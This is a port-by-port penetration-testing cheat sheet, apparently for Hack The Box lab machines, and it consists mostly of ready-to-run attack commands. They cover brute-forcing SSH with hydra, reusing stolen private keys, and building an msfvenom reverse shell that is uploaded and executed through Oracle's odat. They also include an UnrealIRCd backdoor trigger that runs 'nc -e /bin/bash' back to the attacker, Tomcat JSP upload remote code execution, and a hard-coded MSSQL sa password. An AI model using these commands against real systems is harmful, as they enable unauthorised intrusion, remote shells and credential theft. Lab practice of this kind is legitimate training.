Ports

TCP 21: FTP

• Check for anonymous login

• Check if the version is vulnerable to some exploit (highly unlikely)

TCP 22: SSH

• You won't be able to interact with SSH initially. Try to find the password and username by enumerating other ports.

• If you can only find the username then use that username and brute-force ssh login with hydra.

• If you have read permissions on /root/.ssh, then copy the id_rsa (private key) to your machine. Give the permission as 600 and then ssh with it.

ssh root@IP -i id_rsa

TCP 53: DNS

nslookup
> server 10.10.10.10
> 10.10.10.10

dig axfr cronos.htb @10.10.10.10

gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt

TCP 79: Sun Solaris fingerd

Enumerate users: https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl

perl finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76

TCP 80 & 443

• Directory Bruteforce

• Nikto

• Source Code

• LFI/RFI

• LOGIN- Weak Credentials, Default Login, SQLi, Bruteforce

• Google(Searchsploit)- Application Name or any Keyword

TCP 110: POP3

telnet 10.10.10.10 110
>USER mindy
>PASS mindy
>list                    (list emails)
>retr 1                  (read email)

UDP 116: SNMP

snmpwalk -c public -v 1 10.10.10.10

The default community string is "public" (You might get it from nmap scan)

TCP 139 & 445: SMB

smbclient -L //10.10.10.10

smbclient //10.10.10.10/sharename

smbclient //10.10.10.10/sharename -U username

smbmap -H 10.10.10.10

enum4linux 10.10.10.10

TCP 389: LDAP

nmap -p 389 --script ldap-search

TCP 1433: MSSQL

sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

TCP 1521

Oracle TNS listener 11.2.0.2.0

You will need a tool: https://github.com/quentinhardy/odat#installation-optional-for-development-version

Step 1: Enumerate Oracle System ID.

python3 odat.py sidguesser -s 10.10.10.82 -p 1521

It will give you a list of strings such as "XE,XEXDB"

Step 2: Enumerate valid credentials.

python3 odat.py passwordguesser -s 10.10.10.82 -p1521 -d XE --accounts-file accounts/accounts_small.txt

If accounts dir doesn't work then use oracle_default_userpass.txt

Step 3: Create reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp  LHOST=10.10.14.4 LPORT=1234 -f exe > silo.exe

Step 4: Upload the shell to database.

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo.exe ~/silo.exe

If you get an error while uploading then check if user is given sysdba priv.

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo.exe ~/silo.exe --sysdba

Step 5: Run the shell on target machine.

python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp silo.exe --sysdba

TCP 4555: JAMES Remote Admin

nc 10.10.10.10 4555
> listusers
> setpassword mindy mindy

TCP 5984: CouchDB 1.6.0

Exploit:
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

TCP 6379: Redis key-value store 4.0.9

Automated: https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py

python redis.py 10.10.10.160 redis

Manual: https://medium.com/@bigb0ss/htb-postman-write-up-34bc4fe5daa

TCP 8067: irc

UnrealIRC

nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.4 4444"  10.10.10.117

TCP 8080

Tomcat Login Page: 10.10.10.10/manager/html

Login to this page with credentials found. Then upload to war file to get a reverse shell

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)

curl -X PUT http://IP:8080/shell.jsp/ -d @- < shell.jsp

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)

python 42966.py -u http://IP:8080 -p pwn

TCP 9256: AChat

BoF exploit on eploitdb. Modify it to get shell